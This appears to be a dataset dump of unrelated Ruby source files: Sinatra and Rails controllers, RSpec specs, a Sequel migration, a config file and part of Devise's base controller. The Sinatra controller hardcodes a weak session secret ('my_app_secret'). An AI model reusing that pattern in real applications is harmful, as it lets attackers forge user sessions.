bb9128639614a6b95e5facf9fda45a0d2e8c64a6 | 693 | require './config/environment'
class ApplicationController < Sinatra::Base
configure do
set :public_folder, 'public'
set :views, 'app/views'
enable :sessions
set :session_secret, "my_app_secret"
register Sinatra::Flash
end
get "/" do
erb :'welcome'
end
helpers do
def logged_in?
!!current_user
end
def current_user
@current_user ||= CareGiver.find_by(id: session[:care_giver_id]) if session[:care_giver_id]
end
end
def authorized_to_edit?(daily_activity)
daily_activity.care_giver == current_user
end
def set_daily_activity
@daily_activity = DailyActivity.find_by(id: params[:id])
end
end
| 16.5 | 98 | 0.676768 |
1836618c064200bd1604bc0a0f6d9fcb4fbf67fe | 1,558 | =begin
#Topological Inventory Ingress API
#Topological Inventory Ingress API
The version of the OpenAPI document: 0.0.2
Contact: [email protected]
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 4.2.0
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for TopologicalInventoryIngressApiClient::InventoryCollectionVmSecurityGroup
# Automatically generated by openapi-generator (https://openapi-generator.tech)
# Please update as you see appropriate
describe 'InventoryCollectionVmSecurityGroup' do
before do
# run before each test
@instance = TopologicalInventoryIngressApiClient::InventoryCollectionVmSecurityGroup.new
end
after do
# run after each test
end
describe 'test an instance of InventoryCollectionVmSecurityGroup' do
it 'should create an instance of InventoryCollectionVmSecurityGroup' do
expect(@instance).to be_instance_of(TopologicalInventoryIngressApiClient::InventoryCollectionVmSecurityGroup)
end
end
describe 'test attribute "name"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "data"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "partial_data"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 28.851852 | 115 | 0.766367 |
613efd9de9777b955193d79da33c2d5efee4a18e | 5,789 | require 'spec_helper'
# This spec was generated by rspec-rails when you ran the scaffold generator.
# It demonstrates how one might use RSpec to specify the controller code that
# was generated by Rails when you ran the scaffold generator.
#
# It assumes that the implementation code is generated by the rails scaffold
# generator. If you are using any extension libraries to generate different
# controller code, this generated spec may or may not pass.
#
# It only uses APIs available in rails and/or rspec-rails. There are a number
# of tools you can use to make these specs even more expressive, but we're
# sticking to rails and rspec-rails APIs to keep things simple and stable.
#
# Compared to earlier versions of this generator, there is very limited use of
# stubs and message expectations in this spec. Stubs are only used when there
# is no simpler way to get a handle on the object needed for the example.
# Message expectations are only used when there is no simpler way to specify
# that an instance is receiving a specific message.
describe AppsController do
before do
pwd = 'cloud$'
@user = User.create! :first_name => 'Dale', :last_name => 'Olds', :display_name => 'Dale O.', :password => pwd, :confirm_password => pwd, :email => '[email protected]'
sign_in @user
end
# This should return the minimal set of attributes required to create a valid
# App. As you add validations to App, be sure to
# update the return value of this method accordingly.
def valid_attributes
{ :display_name => 'Transcoder', :creator => @user, :project => @user.personal_org.default_project, :url => "trans.cloudfoundry.com"}
end
describe "GET index" do
it "assigns all apps as @apps" do
app = App.create! valid_attributes
get :index
assigns(:apps).should eq([app])
end
end
describe "GET show" do
it "assigns the requested app as @app" do
app = App.create! valid_attributes
get :show, :id => app.id.to_s
assigns(:app).should eq(app)
end
end
describe "GET new" do
it "assigns a new app as @app" do
get :new
assigns(:app).should be_a_new(App)
end
end
describe "GET import" do
it "does not import any apps and redirects to the oauth authorization page for cloudfoundry" do
get :import
response.should redirect_to "/users/auth/cloudfoundry"
end
end
describe "GET edit" do
it "assigns the requested app as @app" do
app = App.create! valid_attributes
get :edit, :id => app.id.to_s
assigns(:app).should eq(app)
end
end
describe "POST create" do
describe "with valid params" do
it "creates a new App" do
expect {
post :create, :app => valid_attributes
}.to change(App, :count).by(1)
end
it "assigns a newly created app as @app" do
post :create, :app => valid_attributes
assigns(:app).should be_a(App)
assigns(:app).should be_persisted
end
it "redirects to the created app" do
post :create, :app => valid_attributes
response.should redirect_to(App.last)
end
end
describe "with invalid params" do
it "assigns a newly created but unsaved app as @app" do
# Trigger the behavior that occurs when invalid params are submitted
App.any_instance.stub(:save).and_return(false)
post :create, :app => {}
assigns(:app).should be_a_new(App)
end
it "re-renders the 'new' template" do
# Trigger the behavior that occurs when invalid params are submitted
App.any_instance.stub(:save).and_return(false)
post :create, :app => {}
response.should render_template("new")
end
end
end
describe "PUT update" do
describe "with valid params" do
it "updates the requested app" do
app = App.create! valid_attributes
# Assuming there are no other apps in the database, this
# specifies that the App created on the previous line
# receives the :update_attributes message with whatever params are
# submitted in the request.
App.any_instance.should_receive(:update_attributes).with({'these' => 'params'})
put :update, :id => app.id, :app => {'these' => 'params'}
end
it "assigns the requested app as @app" do
app = App.create! valid_attributes
put :update, :id => app.id, :app => valid_attributes
assigns(:app).should eq(app)
end
it "redirects to the app" do
app = App.create! valid_attributes
put :update, :id => app.id, :app => valid_attributes
response.should redirect_to(app)
end
end
describe "with invalid params" do
it "assigns the app as @app" do
app = App.create! valid_attributes
# Trigger the behavior that occurs when invalid params are submitted
App.any_instance.stub(:save).and_return(false)
put :update, :id => app.id.to_s, :app => {}
assigns(:app).should eq(app)
end
it "re-renders the 'edit' template" do
app = App.create! valid_attributes
# Trigger the behavior that occurs when invalid params are submitted
App.any_instance.stub(:save).and_return(false)
put :update, :id => app.id.to_s, :app => {}
response.should render_template("edit")
end
end
end
describe "DELETE destroy" do
it "destroys the requested app" do
app = App.create! valid_attributes
expect {
delete :destroy, :id => app.id.to_s
}.to change(App, :count).by(-1)
end
it "redirects to the apps list" do
app = App.create! valid_attributes
delete :destroy, :id => app.id.to_s
response.should redirect_to(apps_url)
end
end
end
| 33.853801 | 169 | 0.658836 |
79abba78c0737f6f445549e68feead65c7582931 | 155 | class BadgeGroupingSerializer < ApplicationSerializer
attributes :id, :name, :description, :position, :system
def system
object.system?
end
end
| 19.375 | 57 | 0.754839 |
4a8683d925805c13359dbc0d3d3114e3940522c7 | 2,828 | Sequel.migration do
up do
# The denormalised pact publication details for each publication
create_view(:all_pact_publications,
Sequel::Model.db[:pact_publications].select(
Sequel[:pact_publications][:id],
Sequel[:c][:id].as(:consumer_id), Sequel[:c][:name].as(:consumer_name),
Sequel[:cv][:id].as(:consumer_version_id), Sequel[:cv][:number].as(:consumer_version_number), Sequel[:cv][:order].as(:consumer_version_order),
Sequel[:p][:id].as(:provider_id), Sequel[:p][:name].as(:provider_name),
Sequel[:pact_publications][:revision_number], Sequel[:pv][:id].as(:pact_version_id), Sequel[:pv][:sha].as(:pact_version_sha), Sequel[:pact_publications][:created_at]).
join(:versions, {:id => :consumer_version_id}, {:table_alias => :cv, implicit_qualifier: :pact_publications}).
join(:pacticipants, {:id => :pacticipant_id}, {:table_alias => :c, implicit_qualifier: :cv}).
join(:pacticipants, {:id => :provider_id}, {:table_alias => :p, implicit_qualifier: :pact_publications}).
join(:pact_versions, {:id => :pact_version_id}, {:table_alias => :pv, implicit_qualifier: :pact_publications})
)
# Latest revision number for each consumer version order
create_view(:latest_pact_publication_revision_numbers,
"select provider_id, consumer_id, consumer_version_order, max(revision_number) as latest_revision_number
from all_pact_publications
group by provider_id, consumer_id, consumer_version_order"
)
# Latest pact_publication (revision) for each provider/consumer version
# updated in 20180519_recreate_views.rb
create_view(:latest_pact_publications_by_consumer_versions,
"select app.*
from all_pact_publications app
inner join latest_pact_publication_revision_numbers lr
on app.consumer_id = lr.consumer_id
and app.provider_id = lr.provider_id
and app.consumer_version_order = lr.consumer_version_order
and app.revision_number = lr.latest_revision_number"
)
# updated in 20180519_recreate_views.rb
# This view tells us the latest consumer version with a pact for a consumer/provider pair
create_or_replace_view(:latest_pact_consumer_version_orders,
"select provider_id, consumer_id, max(consumer_version_order) as latest_consumer_version_order
from all_pact_publications
group by provider_id, consumer_id"
)
# Latest pact publications by consumer/provider
create_view(:latest_pact_publications,
"select lpcv.*
from latest_pact_publications_by_consumer_versions lpcv
inner join latest_pact_consumer_version_orders lp
on lpcv.consumer_id = lp.consumer_id
and lpcv.provider_id = lp.provider_id
and lpcv.consumer_version_order = latest_consumer_version_order"
)
end
end
| 49.614035 | 173 | 0.732673 |
010d9d865082bc0cd6f6e92b541a937c017cd8ec | 285 | require 'rails_helper'
describe 'JustDatetimePickerInput', type: :feature do
context 'Form' do
before do
add_user_resource
end
it 'shows input' do
visit new_admin_user_path
expect(page).to have_css('.just_datetime_picker', count: 1)
end
end
end
| 19 | 65 | 0.691228 |
876025a5dbac62ef834e782a5bbf256697dfe977 | 88 | $LOAD_PATH << "#{File.dirname(__FILE__)}/../lib"
require 'compiler'
Compiler.make_all
| 14.666667 | 48 | 0.704545 |
26def9261d5d920d0b917842c9e747b7136f8001 | 589 | module Recurr
module Events
class Base
attr_reader :options, :starts
attr_accessor :start_year,
:start_month,
:start_day
DAY_REPRESENTATION = 24 * 3600
def initialize(options)
@options = options
@starts = options[:starts]&.to_time || Time.current
@start_year = starts.year
@start_month = starts.month
@start_day = starts.day
end
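      # Subclasses are expected to implement #current and #next. As a purely
      # hypothetical example, a daily event could return `starts` from #current
      # and `starts + DAY_REPRESENTATION` (one day in seconds) from #next.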
def current
raise NotImplementedError
end
def next
raise NotImplementedError
end
end
end
end
| 19.633333 | 59 | 0.573854 |
d54a3282b7d6070c1e58efefbd69682b17a2a9c0 | 2,491 | Addressbookserver::Application.configure do
# Settings specified here will take precedence over those in config/application.rb
# Code is not reloaded between requests
config.cache_classes = true
# Full error reports are disabled and caching is turned on
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Disable Rails's static asset server (Apache or nginx will already do this)
config.serve_static_assets = false
# Compress JavaScripts and CSS
config.assets.compress = true
# Don't fallback to assets pipeline if a precompiled asset is missed
config.assets.compile = false
# Generate digests for assets URLs
config.assets.digest = true
# Defaults to nil and saved in location specified by config.assets.prefix
# config.assets.manifest = YOUR_PATH
# Specifies the header that your server uses for sending files
# config.action_dispatch.x_sendfile_header = "X-Sendfile" # for apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for nginx
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# See everything in the log (default is :info)
# config.log_level = :debug
# Prepend all log lines with the following tags
# config.log_tags = [ :subdomain, :uuid ]
# Use a different logger for distributed setups
# config.logger = ActiveSupport::TaggedLogging.new(SyslogLogger.new)
# Use a different cache store in production
# config.cache_store = :mem_cache_store
# Enable serving of images, stylesheets, and JavaScripts from an asset server
# config.action_controller.asset_host = "http://assets.example.com"
# Precompile additional assets (application.js, application.css, and all non-JS/CSS are already added)
# config.assets.precompile += %w( search.js )
# Disable delivery errors, bad email addresses will be ignored
# config.action_mailer.raise_delivery_errors = false
# Enable threaded mode
# config.threadsafe!
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation can not be found)
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners
config.active_support.deprecation = :notify
# Log the query plan for queries taking more than this (works
# with SQLite, MySQL, and PostgreSQL)
# config.active_record.auto_explain_threshold_in_seconds = 0.5
end
| 36.632353 | 104 | 0.760739 |
38987a2025c4e81161ae70e6712dadff4a9a7cef | 700 | #
# This code handles the creation of the github client with or without an auth token
#
# This class smells of :reek:UtilityFunction
class GithubListerCore
class << self
#
# Everything from here is private
#
private
#
# Initialise the client and set auto_paginate to true
#
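# get_option is assumed to be a helper defined elsewhere in this gem that reads a
# key from the options hash; it is not shown in this file. Hedged sketch of the intent:
#
#   init_client(:token => ENV['GITHUB_TOKEN'])  # authenticated, auto-paginating client
#   init_client                                 # anonymous client, subject to stricter rate limits
#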
def init_client(options = {})
token = get_option(options, :token)
client = if token
Octokit::Client.new(:access_token => token)
else
Octokit::Client.new
end
client.auto_paginate = true
client
end
end
end
| 25 | 83 | 0.522857 |
79dd5bb69f11006d650eb9ba120b2dbca6dc658f | 488 | module SS::Model::MailSetting
extend ActiveSupport::Concern
extend SS::Translation
included do
field :sender_name, type: String
field :sender_email, type: String
field :mail_signature, type: String
permit_params :sender_name, :sender_email, :mail_signature
validates :sender_email, email: true
end
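# Formats the From-style address used on outgoing mail. Illustrative values only:
# with sender_name "Shirasagi" and sender_email "[email protected]" this returns
# "Shirasagi <[email protected]>"; without a sender_name it returns the bare address,
# and a blank sender_email falls back to SS.config.mail.default_from.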
def sender_address
email = sender_email.presence || SS.config.mail.default_from
sender_name.present? ? "#{sender_name} <#{email}>" : email
end
end | 25.684211 | 64 | 0.727459 |
bbc71a03f51264e34572a6239a9e8188ab40bd1d | 16,998 | #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#
# Copyright (c) 2016, Electric Power Research Institute (EPRI)
# All rights reserved.
#
# OpenADR ("this software") is licensed under BSD 3-Clause license.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of EPRI nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
# OF SUCH DAMAGE.
#
# This EPRI software incorporates work covered by the following copyright and permission
# notices. You may not use these works except in compliance with their respective
# licenses, which are provided below.
#
# These works are provided by the copyright holders and contributors "as is" and any express or
# implied warranties, including, but not limited to, the implied warranties of merchantability
# and fitness for a particular purpose are disclaimed.
#
#########################################################################################
# MIT Licensed Libraries
#########################################################################################
#
# * actionmailer 3.2.12 (http://www.rubyonrails.org) - Email composition, delivery, and receiving framework (part of Rails).
# * actionpack 3.2.12 (http://www.rubyonrails.org) - Web-flow and rendering framework putting the VC in MVC (part of Rails).
# * activemodel 3.2.12 (http://www.rubyonrails.org) - A toolkit for building modeling frameworks (part of Rails).
# * activerecord 3.2.12 (http://www.rubyonrails.org) - Object-relational mapper framework (part of Rails).
# * activeresource 3.2.12 (http://www.rubyonrails.org) - REST modeling framework (part of Rails).
# * activesupport 3.2.12 (http://www.rubyonrails.org) - A toolkit of support libraries and Ruby core extensions extracted from the Rails framework.
# * arel 3.0.2 (http://github.com/rails/arel) - Arel is a SQL AST manager for Ruby
# * bootstrap-sass 3.1.1.0 (https://github.com/twbs/bootstrap-sass) - Twitter's Bootstrap, converted to Sass and ready to drop into Rails or Compass
# * builder 3.0.4 (http://onestepback.org) - Builders for MarkUp.
# * bundler 1.12.5 (http://bundler.io) - The best way to manage your application's dependencies
# * capybara 2.4.4 (http://github.com/jnicklas/capybara) - Capybara aims to simplify the process of integration testing Rack applications, such as Rails, Sinatra or Merb
# * coffee-rails 3.2.2 () - Coffee Script adapter for the Rails asset pipeline.
# * coffee-script-source 1.6.3 (http://jashkenas.github.com/coffee-script/) - The CoffeeScript Compiler
# * docile 1.1.5 (https://ms-ati.github.io/docile/) - Docile keeps your Ruby DSLs tame and well-behaved
# * edn 1.0.0 () - 'edn implements a reader for Extensible Data Notation by Rich Hickey.'
# * erubis 2.7.0 (http://www.kuwata-lab.com/erubis/) - a fast and extensible eRuby implementation which supports multi-language
# * execjs 1.4.0 (https://github.com/sstephenson/execjs) - Run JavaScript code from Ruby
# * factory_girl 4.5.0 (https://github.com/thoughtbot/factory_girl) - factory_girl provides a framework and DSL for defining and using model instance factories.
# * factory_girl_rails 4.5.0 (http://github.com/thoughtbot/factory_girl_rails) - factory_girl_rails provides integration between factory_girl and rails 3
# * gem-licenses 0.1.2 (http://github.com/dblock/gem-licenses) - List all gem licenses.
# * hike 1.2.3 (http://github.com/sstephenson/hike) - Find files in a set of paths
# * i18n 0.6.5 (http://github.com/svenfuchs/i18n) - New wave Internationalization support for Ruby
# * jdbc-postgresql 9.2.1000 (https://github.com/rosenfeld/jdbc-postgresql) - PostgresSQL jdbc driver for JRuby
# * journey 1.0.4 (http://github.com/rails/journey) - Journey is a router
# * jquery-rails 3.0.4 (http://rubygems.org/gems/jquery-rails) - Use jQuery with Rails 3
# * json-schema 2.6.2 (http://github.com/ruby-json-schema/json-schema/tree/master) - Ruby JSON Schema Validator
# * mail 2.4.4 (http://github.com/mikel/mail) - Mail provides a nice Ruby DSL for making, sending and reading emails.
# * metaclass 0.0.4 (http://github.com/floehopper/metaclass) - Adds a metaclass method to all Ruby objects
# * mime-types 1.23 (http://mime-types.rubyforge.org/) - This library allows for the identification of a file's likely MIME content type
# * mocha 1.1.0 (http://gofreerange.com/mocha/docs) - Mocking and stubbing library
# * multi_json 1.7.9 (http://github.com/intridea/multi_json) - A common interface to multiple JSON libraries.
# * nokogiri 1.6.5 (http://nokogiri.org) - Nokogiri (鋸) is an HTML, XML, SAX, and Reader parser
# * polyglot 0.3.3 (http://github.com/cjheath/polyglot) - Augment 'require' to load non-Ruby file types
# * rack-test 0.6.2 (http://github.com/brynary/rack-test) - Simple testing API built on Rack
# * railties 3.2.12 (http://www.rubyonrails.org) - Tools for creating, working with, and running Rails applications.
# * rake 10.1.0 (http://rake.rubyforge.org) - Ruby based make-like utility.
# * rspec-core 2.14.3 (http://github.com/rspec/rspec-core) - rspec-core-2.14.3
# * rspec-expectations 2.14.0 (http://github.com/rspec/rspec-expectations) - rspec-expectations-2.14.0
# * rspec-mocks 2.14.1 (http://github.com/rspec/rspec-mocks) - rspec-mocks-2.14.1
# * rspec-rails 2.14.0 (http://github.com/rspec/rspec-rails) - rspec-rails-2.14.0
# * sass 3.2.9 (http://sass-lang.com/) - A powerful but elegant CSS compiler that makes CSS fun again.
# * sass-rails 3.2.6 () - Sass adapter for the Rails asset pipeline.
# * simplecov 0.9.0 (http://github.com/colszowka/simplecov) - Code coverage for Ruby 1.9+ with a powerful configuration library and automatic merging of coverage across test suites
# * spork 1.0.0rc3 (http://github.com/sporkrb/spork) - spork
# * therubyrhino 2.0.2 (http://github.com/cowboyd/therubyrhino) - Embed the Rhino JavaScript interpreter into JRuby
# * thor 0.18.1 (http://whatisthor.com/) - A scripting framework that replaces rake, sake and rubigen
# * tilt 1.4.1 (http://github.com/rtomayko/tilt/) - Generic interface to multiple Ruby template engines
# * treetop 1.4.14 (https://github.com/cjheath/treetop) - A Ruby-based text parsing and interpretation DSL
# * uglifier 2.1.2 (http://github.com/lautis/uglifier) - Ruby wrapper for UglifyJS JavaScript compressor
# * xpath 2.0.0 (http://github.com/jnicklas/xpath) - Generate XPath expressions from Ruby
# * blankslate 2.1.2.4 (http://github.com/masover/blankslate) - BlankSlate extracted from Builder.
# * bourbon 3.1.8 (https://github.com/thoughtbot/bourbon) - Bourbon Sass Mixins using SCSS syntax.
# * coffee-script 2.2.0 (http://github.com/josh/ruby-coffee-script) - Ruby CoffeeScript Compiler
# * diff-lcs 1.2.4 (http://diff-lcs.rubyforge.org/) - Diff::LCS computes the difference between two Enumerable sequences using the McIlroy-Hunt longest common subsequence (LCS) algorithm
# * jquery-ui-rails 4.0.3 (https://github.com/joliss/jquery-ui-rails) - jQuery UI packaged for the Rails asset pipeline
# * parslet 1.4.0 (http://kschiess.github.com/parslet) - Parser construction library with great error reporting in Ruby.
# * rack 1.4.5 (http://rack.github.com/) - a modular Ruby webserver interface
# * rack-cache 1.2 (http://tomayko.com/src/rack-cache/) - HTTP Caching for Rack
# * rack-ssl 1.3.3 (https://github.com/josh/rack-ssl) - Force SSL/TLS in your app.
# * rails 3.2.12 (http://www.rubyonrails.org) - Full-stack web application framework.
# * simplecov-html 0.8.0 (https://github.com/colszowka/simplecov-html) - Default HTML formatter for SimpleCov code coverage tool for ruby 1.9+
# * tzinfo 0.3.37 (http://tzinfo.rubyforge.org/) - Daylight-savings aware timezone library
# * warbler 1.4.0.beta1 (http://caldersphere.rubyforge.org/warbler) - Warbler chirpily constructs .war files of your Rails applications.
#
#########################################################################################
# BSD Licensed Libraries
#########################################################################################
#
# * activerecord-jdbc-adapter 1.2.9.1 (https://github.com/jruby/activerecord-jdbc-adapter) - Copyright (c) 2006-2012 Nick Sieger <[email protected]>, Copyright (c) 2006-2008 Ola Bini <[email protected]>
# * jdbc-postgres 9.2.1004 (https://github.com/jruby/activerecord-jdbc-adapter) - Copyright (c) 1997-2011, PostgreSQL Global Development Group
# * d3js 3.5.16 (https://d3js.org/) Copyright (c) 2015 Mike Bostock
#
#########################################################################################
# Ruby Licensed Libraries
#########################################################################################
#
# * json 1.8.0 (http://json-jruby.rubyforge.org/) - JSON implementation for JRuby
# * rubyzip 0.9.9 (http://github.com/aussiegeek/rubyzip) - rubyzip is a ruby module for reading and writing zip files
# * httpclient 2.3.4.1 (http://github.com/nahi/httpclient) - gives something like the functionality of libwww-perl (LWP) in Ruby
# * test-unit 2.5.5 (http://test-unit.rubyforge.org/) - test-unit - Improved version of Test::Unit bundled in Ruby 1.8.x.
#
#########################################################################################
# Public domain - creative commons Licensed Libraries
#########################################################################################
#
# * torquebox 3.1.2 (http://torquebox.org/) - TorqueBox Gem
# * torquebox-cache 3.1.2 (http://torquebox.org/) - TorqueBox Cache Gem
# * torquebox-configure 3.1.2 (http://torquebox.org/) - TorqueBox Configure Gem
# * torquebox-core 3.1.2 (http://torquebox.org/) - TorqueBox Core Gem
# * torquebox-messaging 3.1.2 (http://torquebox.org/) - TorqueBox Messaging Client
# * torquebox-naming 3.1.2 (http://torquebox.org/) - TorqueBox Naming Client
# * torquebox-rake-support 3.1.2 (http://torquebox.org/) - TorqueBox Rake Support
# * torquebox-security 3.1.2 (http://torquebox.org/) - TorqueBox Security Gem
# * torquebox-server 3.1.2 (http://torquebox.org/) - TorqueBox Server Gem
# * torquebox-stomp 3.1.2 (http://torquebox.org/) - TorqueBox STOMP Support
# * torquebox-transactions 3.1.2 (http://torquebox.org/) - TorqueBox Transactions Gem
# * torquebox-web 3.1.2 (http://torquebox.org/) - TorqueBox Web Gem
#
#########################################################################################
# Apache Licensed Libraries
#########################################################################################
#
# * addressable 2.3.8 (https://github.com/sporkmonger/addressable) - URI Implementation
# * bcrypt-ruby 3.0.1 (http://bcrypt-ruby.rubyforge.org) - OpenBSD's bcrypt() password hashing algorithm.
# * database_cleaner 1.4.0 (http://github.com/bmabey/database_cleaner) - Strategies for cleaning databases. Can be used to ensure a clean state for testing.
# * annotate 2.5.0 (http://github.com/ctran/annotate_models) - Annotates Rails Models, routes, fixtures, and others based on the database schema.
# * nvd3 1.8.4 (http://nvd3.org/) Copyright (c) 2014 Novus Partners - chart library based on d3js
# * smack 3.3.1 (https://www.igniterealtime.org/projects/smack/) - XMPP library
#
#########################################################################################
# LGPL
#########################################################################################
#
# * jruby-1.7.4
# * jruby-jars 1.7.4 (http://github.com/jruby/jruby/tree/master/gem/jruby-jars) - The core JRuby code and the JRuby stdlib as jar
# ** JRuby is tri-licensed GPL, LGPL, and EPL.
#
#########################################################################################
# MPL Licensed Libraries
#########################################################################################
#
# * therubyrhino_jar 1.7.4 (http://github.com/cowboyd/therubyrhino) - Rhino's jars packed for therubyrhino
#
#########################################################################################
# Artistic 2.0
# * mime-types 1.23 (http://mime-types.rubyforge.org/) - This library allows for the identification of a file's likely MIME content type
#
#########################################################################################
#
#########################################################################################
# GPL-2
#########################################################################################
# * mime-types 1.23 (http://mime-types.rubyforge.org/) - This library allows for the identification of a file's likely MIME content type
#
#########################################################################################
# No License Given
#########################################################################################
#
# * spork-testunit 0.0.8 (http://github.com/timcharper/spork-testunit) - spork-testunit
# * sprockets 2.2.2 (http://getsprockets.org/) - Rack-based asset packaging system
#
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
class CreateReportsController < BaseController
before_filter :logged_in_account
before_filter :correct_account, except: [:new, :create]
before_filter { |c| c.set_parent_menu_item_class NavigationHelper::VENS_MENU_ITEM_CLASS }
# before_filter :admin_account, except: [:show]
########################################################
def send_to_ven
@create_report.queue_create_report
redirect_to create_report_path(@create_report), notice: 'Report Request queued for VEN.'
end
########################################################
def cancel_create_report
report_to_follow = params[:create_report][:report_to_follow]
@create_report.queue_cancel_report(report_to_follow == "1")
redirect_to create_report_path(@create_report), notice: 'Report Cancellation queued for VEN.'
end
########################################################
def show
end
########################################################
def new
@account = current_account
@ven = @account.vens.find(params[:ven_id])
@create_report = @ven.create_reports.new
end
########################################################
def create
@report_request = ReportRequest.new
@account = current_account
@ven = @account.vens.find(params[:ven_id])
@create_report = @ven.create_reports.build(params[:create_report])
@create_report.request_id = SecureRandom.hex(10)
respond_to do |format|
if @create_report.save
format.html { redirect_to create_report_path(@create_report), notice: 'Report Request was successfully created.' }
else
format.html { render action: "new" }
end
end
end
########################################################
def update
@report_request = nil
respond_to do |format|
if @create_report.update_attributes(params[:create_report])
# format.html { redirect_to edit_ven_url(@ven), notice: 'VEN was successfully updated.' }
flash.now[:notice] = 'Report Request was successfully updated.'
format.html { render :show }
format.json { head :no_content }
else
format.html { render action: "show" }
end
end
end
########################################################
def destroy
@create_report.destroy
respond_to do |format|
flash[:notice] = "Report Request deleted"
format.html { redirect_to :back }
format.json { head :no_content }
end
end
########################################################
private
def correct_account
@create_report = CreateReport.find(params[:id])
@account = @create_report.ven.account
correct_account_or_admin @account
end
end
| 57.425676 | 206 | 0.62678 |
e28554f08c0a2b6b57fab7fb86ebd1ff8304543f | 434 | # These are Class level methods.
module Effective
module EffectiveDatatable
module Dsl
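# Each helper below captures its block and defines an initialize_* method that is
# instance_exec'd when the datatable is built. A hedged usage sketch (class and
# block contents are illustrative only):
#
#   class PostsDatatable < Effective::Datatable
#     datatable do
#       # column / table definitions, evaluated via initialize_datatable
#     end
#
#     scopes do
#       # scope definitions, evaluated via initialize_scopes
#     end
#   end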
def datatable(&block)
define_method('initialize_datatable') { instance_exec(&block) }
end
def scopes(&block)
define_method('initialize_scopes') { instance_exec(&block) }
end
def charts(&block)
define_method('initialize_charts') { instance_exec(&block) }
end
end
end
end
| 19.727273 | 71 | 0.652074 |
bb3feafa692471af6e42091e97a3c5efc8ecaad4 | 6,030 | # All Devise controllers are inherited from here.
class DeviseController < Devise.parent_controller.constantize
include Devise::Controllers::ScopedViews
helper DeviseHelper
helpers = %w(resource scope_name resource_name signed_in_resource
resource_class resource_params devise_mapping)
helper_method(*helpers)
prepend_before_filter :assert_is_devise_resource!
respond_to :html if mimes_for_respond_to.empty?
# Override prefixes to consider the scoped view.
# Notice we need to check for the request due to a bug in
# Action Controller tests that forces _prefixes to be
# loaded before even having a request object.
#
# This method should be public as it is in ActionPack
# itself. Changing its visibility may break other gems.
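# For example (illustrative): with scoped views enabled and a :user mapping, a
# sessions request would look up templates under "users/sessions" before falling
# back to the usual "devise/sessions" prefixes supplied by super.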
def _prefixes #:nodoc:
@_prefixes ||= if self.class.scoped_views? && request && devise_mapping
["#{devise_mapping.scoped_path}/#{controller_name}"] + super
else
super
end
end
protected
# Gets the actual resource stored in the instance variable
def resource
instance_variable_get(:"@#{resource_name}")
end
# Proxy to devise map name
def resource_name
devise_mapping.name
end
alias :scope_name :resource_name
# Proxy to devise map class
def resource_class
devise_mapping.to
end
# Returns a signed in resource from session (if one exists)
def signed_in_resource
warden.authenticate(scope: resource_name)
end
# Attempt to find the mapped route for devise based on request path
def devise_mapping
@devise_mapping ||= request.env["devise.mapping"]
end
# Checks whether it's a devise mapped resource or not.
def assert_is_devise_resource! #:nodoc:
unknown_action! <<-MESSAGE unless devise_mapping
Could not find devise mapping for path #{request.fullpath.inspect}.
This may happen for two reasons:
1) You forgot to wrap your route inside the scope block. For example:
devise_scope :user do
get "/some/route" => "some_devise_controller"
end
2) You are testing a Devise controller bypassing the router.
If so, you can explicitly tell Devise which mapping to use:
@request.env["devise.mapping"] = Devise.mappings[:user]
MESSAGE
end
# Returns real navigational formats which are supported by Rails
def navigational_formats
@navigational_formats ||= Devise.navigational_formats.select { |format| Mime::EXTENSION_LOOKUP[format.to_s] }
end
def unknown_action!(msg)
logger.debug "[Devise] #{msg}" if logger
raise AbstractController::ActionNotFound, msg
end
# Sets the resource creating an instance variable
def resource=(new_resource)
instance_variable_set(:"@#{resource_name}", new_resource)
end
# Helper for use in before_filters where no authentication is required.
#
# Example:
# before_filter :require_no_authentication, only: :new
def require_no_authentication
assert_is_devise_resource!
return unless is_navigational_format?
no_input = devise_mapping.no_input_strategies
authenticated = if no_input.present?
args = no_input.dup.push scope: resource_name
warden.authenticate?(*args)
else
warden.authenticated?(resource_name)
end
if authenticated && resource = warden.user(resource_name)
flash[:alert] = I18n.t("devise.failure.already_authenticated")
redirect_to after_sign_in_path_for(resource)
end
end
